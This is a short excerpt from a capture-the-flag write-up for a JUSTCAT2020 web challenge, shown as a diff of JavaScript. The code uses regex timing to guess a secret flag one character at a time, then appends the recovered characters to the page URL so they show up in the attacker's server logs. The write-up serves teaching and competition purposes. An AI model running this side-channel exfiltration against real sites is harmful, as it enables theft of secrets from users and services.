RickdeJager/CTF/JUSTCAT2020/web/computeration/writeup.md

   // This took longer than usual, indicating regex-bullshittery if (time > threshold) {
-    // Add the current flag to the url so we can see it in our server logs window.location = window.location.origin + window.location.pathname + "?" + known + c;
     // Update the "known" variable with the new character known = known + c;
+    // Add the current flag to the url so we can see it in our server logs window.location = window.location.origin + window.location.pathname + "?" + known;
   }
 }